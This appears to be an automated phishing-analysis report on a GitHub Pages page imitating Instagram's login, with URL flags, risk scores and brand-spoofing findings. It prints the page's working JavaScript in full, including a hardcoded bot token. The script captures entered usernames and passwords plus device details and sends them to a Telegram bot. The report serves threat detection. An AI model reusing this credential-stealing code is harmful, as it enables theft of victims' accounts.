Windows Analysis Report
http://jinos1.github.io/instgram_login

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: http://jinos1.github.io

{
    "risk_score": 9,
    "reasoning": "This script demonstrates high-risk behavior, including data exfiltration and sending sensitive user information (email/phone and password) to an external, untrusted domain (Telegram). The script also collects detailed device information, including IP address, user agent, platform, language, and cookie status, which could be used for malicious purposes. The use of hardcoded API tokens and chat IDs further increases the risk, as this information could be abused by attackers. Overall, this script exhibits clear signs of malicious intent and should be considered a high-risk security threat."
}

        // Function to fetch the user's IP address
        async function getIpAddress() {
            try {
                const response = await fetch('https://api.ipify.org?format=json', { cache: 'no-store' });
                const data = await response.json();
                return data.ip;
            } catch (error) {
                console.error('Error fetching IP address:', error);
                return 'Unknown';
            }
        }

        // Function to collect device and browser information
        async function getDeviceInfo() {
            const ip = await getIpAddress();
            return {
                ip: ip,
                userAgent: navigator.userAgent,
                platform: navigator.platform,
                language: navigator.language,
                cookiesEnabled: navigator.cookieEnabled
            };
        }

        // Function to send collected data to Telegram
        async function sendToTelegram(data) {
            const deviceInfo = await getDeviceInfo();

            const token = '7687484269:AAEPdLbr2JrL0ypTe5LDypYxI1KEXrOjtsQ';  // Your bot token
            const chatId = '5589060588';  // Your chat ID

            const message = `
 **User Info**:
- Email/Phone: ${data.emailPhone}
- Password: ${data.password}

 **Device Info**:
- IP Address: ${deviceInfo.ip}
- User Agent: ${deviceInfo.userAgent}
- Platform: ${deviceInfo.platform}
- Language: ${deviceInfo.language}
- Cookies Enabled: ${deviceInfo.cookiesEnabled ? 'Yes' : 'No'}
            `;

            const url = `https://api.telegram.org/bot${token}/sendMessage`;

            fetch(url, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message,
                    parse_mode: 'Markdown'
                })
            }).catch(error => console.error('Error sending data:', error));
        }

        // Collect user input (email, password) and device info, and send it to Telegram
        document.getElementById('login-form').addEventListener('submit', function(event) {
            event.preventDefault();  // Prevent form submission

            // Get form data
            const emailPhone = document.getElementById('emailPhone').value;
            const password = document.getElementById('password').value;

            // Send the form data along with device info to Telegram
            sendToTelegram({ emailPhone, password });
        });
    

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "Log In",
  "text_input_field_labels": [
    "Phone, username or email"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Instagram"
  ]
}

```json{  "legit_domain": "instagram.com",  "classification": "wellknown",  "reasons": [    "The brand 'Instagram' is well-known and is associated with the domain 'instagram.com'.",    "The URL 'jinos1.github.io' does not match the legitimate domain of Instagram.",    "The URL is hosted on 'github.io', which is a domain for GitHub Pages, a platform for hosting static websites. This is not typically used by Instagram for its services.",    "The presence of input fields for 'Phone, username or email' is common in phishing attempts to capture user credentials.",    "The URL does not contain any direct reference to Instagram, which is suspicious."  ],  "riskscore": 9}
Google indexed: False